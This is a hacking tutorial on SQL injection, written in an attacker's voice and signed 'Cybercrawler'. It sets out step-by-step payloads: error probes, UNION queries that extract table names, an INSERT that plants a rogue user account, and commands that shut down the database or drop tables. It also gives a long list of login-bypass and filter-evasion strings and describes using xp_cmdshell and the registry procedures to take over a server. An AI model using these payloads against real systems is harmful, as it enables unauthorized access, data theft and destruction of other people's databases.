SQL Injection – Full Disclosure

SQL Injection is a Technique that exploits the vulnerability found in

the Database just by executing SQL statements via the web browser.

Let’s take a simple example of signing up a mail account for the first time.
The input that a user enters in a input box in a website will get stored in a
backend Database and once registered, the next time the user attempt
logging in with username and password, it will compare the input given by
the user with the data stored in the database, and if both matches, it will
grant access to the specified user and will allow him to proceed further with
that login, else it won’t. So, whatever an user gives as an input in the input
box in websites, this will be taken to the backend process, the hackers take
advantage of this and will input some SQL queries in the input boxes and if
the site is vulnerable to SQL injection attack, then it will be compromised.

Here comes the detailed information on how SQL injection works,

SQL refers to Structured Query Language, can also be pronounced as Sequel

is a common language for all the Databases for the manipulation of data
stored in it. SQL queries are used to communicate with Databases
interactively for any kind of manipulations like creating a new table,
modifying, updating, deleting, dropping and so on.

A legitimate user will give his valid credentials in the login form of a website,
where as an hacker will try to execute SQL Queries in the input box instead
of supplying credentials. The Browser sends the request to the server, and
the server will execute the SQL query sent by the attacker. No one can easily
hack into a server that is vulnerable to SQL injection without analyzing the
column name, table name and at least some of its value.
How to find a whether a site is vulnerable to SQL
Injection?

"Blind Injection" - is the prime step that any hacker can validate a site,
whether it is vulberable to SQL Injection attack.

The attackers would try to inject some blind injection like below,

' - Single Quotes

" - Double Quotes

'1 - Single Quote 1

'a - Single Quote a

'; - Single Quotes Semi-colon

What the hell, this will do?

Well, this will fetch them a page with some error message generated by the
Database and if it does then the site is vulnerable to SQL Injection.

The database will generate some error message, because it doesn’t know
how to render the query given and as a result will display an error, showing
clearly that either the Database is not configured properly or the site by
itself. Single quotes ' will often fetch you some errors.
I got an Error, what to do next ?

Even a kid can generate an error like this!

Let’s get the hands wet here, Now try to obtain the column name, table
name, Number of columns and tables available and it will do.

Error by Blind Injection,

ADODB.Recordset error '800a0bb9'

Arguments are of the wrong type, are out of acceptable range, or are in
conflict with one another.

/admin/CheckLogin.asp, line 68

Even there are few admin, who will keep the default settings remain
unchanged, in such cases try default credentials like sa and password, this
depends upon the database.

How to Obtain more details ?

Try this too using a trial and error method but should be reasonable!

Learn more about the errors generated by databases and inject a statement
accordingly that would fetch you some more fruity info.

Let me make one thing clear, that SQL Injection can be exploited in both
ways, that is injection via input boxes like login, search and so on found on
the site, and then by injecting in the URL.

For sure the Database must return an error if you input a data of wrong type.

Let’s take that the target URL looks like below,

www.vulnsite.com\refer.asp?ID=3&action=view

Try some trial and error method here, just by changing the URL parameters
like below,...

www.vulnsite.com\refer.asp?ID=0

www.vulnsite.com\refer.asp?ID=-1

www.vulnsite.com\refer.asp?ID=3&action=edit

www.vulnsite.com\refer.asp?ID=3&action=manage

www.vulnsite.com\refer.asp?ID=3&action=modify

and so on...... ( Note : This is just a blind Injection )

www.vulnsite.com\refer.asp?ID=30 union select top 1 table_name from

information_schema.tables--

The URL which is in blue color is a legitimate one, and the remaining
contains malicious SQL Injection codes that will fetch you the table name
from the victims database and let’s take you got the table name and its
users,

www.vulnsite.com\refer.asp?ID=30 insert into

users('id','username','password','info')values(100,'crawl','pass','')—

This will create a new user account in the database remotely, and now you
can login with the newly created user account and can do whatever you wish
to do.
This is one of the ways, where as there are several other ways....

Even there are few SQL built-in procedures that widely open way for the
hackers to remotely shutdown the SQL service, Drop the data that too
without any primary authentication.

'; shutdown --

Can be used to shutdown the SQL service remotely.

'; drop table users --

Used to drop tables from the Database remotely.

Here is a common one that really exploited most of the site previously,

1 = 1 --

When an attacker inputs this inside the input box, what happens is that the
statement 1=1 becomes true, since one always equals one ( 1 is equal to 1 )
is a globally true statement, and -- is used for commenting in SQL, so
whatever that comes after -- will be ignored. just by injecting this an attacker
can easily gain access to a vulnerable site and wreak havoc.
Whatever you found till now were the familiar ones, but still there are
mushrooms of Blind SQL injection found and it’s been listed here....

admin' --

admin' #

admin'/*

1=1--

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

1' OR '1'='1

') or ('1'='1--

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

SELECT * FROM members WHERE username = 'admin'--' AND password =

'password'

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0

SELECT login + '-' + password FROM members

SELECT login || '-' || password FROM members

SELECT CONCAT(login, password) FROM members

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
SELECT CHAR(75)+CHAR(76)+CHAR(77)

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM
members

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

DR/**/OP/*bypass blacklisting*/sampletable

SELECT/*avoid-spaces*/password/**/FROM/**/Members

SELECT /*!32302 1/0, */ 1 FROM tablename

SELECT * FROM products WHERE id = 10; DROP members--

What else can an Hacker do with this ?

If the site administrator is not aware of the built-in procedures that comes
with SQL, and if it is not restricted, then the attacker can easily root the box.

An attacker can remotely launch a CMD_SHELL and can execute commands

and even shutdown the whole server resulting in Denial of Service ( DoS )
attack.

They also can have access to registry, can create a new administrator
account remotely and can change them into botnet and blah blah blah...........

Here are the few,

sp_passsword -> Changes password for a specific login name.

e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.

e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator
privileges.

exec master..xp_cmdshel 'dir' -> Displays the directory listing of the current
working directory

e.g. master..xp_msver

exec master..xp_cmdshel 'net1 user'

xp_regaddmultistring

xp_regdeletekey Deletes a registry key.

xp_regdeletevalue Deletes a registry value

xp_regenumkeys

xp_regenumvalues

xp_regread Reads a registry value

xp_regremovemultistring

xp_regwrite Writes a registry key.

xp_terminate_process Stops a process

xp_availablemedia reveals the available drives on the box

xp_dirtree allows a directory tree to be obtained

xp_enumdsn enumerates ODBC data sources on the server

xp_loginconfig reveals the informatio about mode of the

security

xp_makecab allows a user to create a compressed archive of

files on the server

xp_ntsec_enumdomains enumerated domains that the server can access

xp_terminate_process Terminates a process, given its PID

There are few SQL Injection - vulnerability assessment tools available on the
internet for free of cost,

where you can assess whether your resource is vulnerable to SQL injection or
not.

SQLBF - MS SQL server password auditor

SQL Dict - MS SQL Based Dictionary cracker

SQL Smack - Used to execute remote commands

SQL Poke - SQL Port Scanner, connects with SA ands executes

commands
 - Cybercrawler

www.technocrawler.co.cc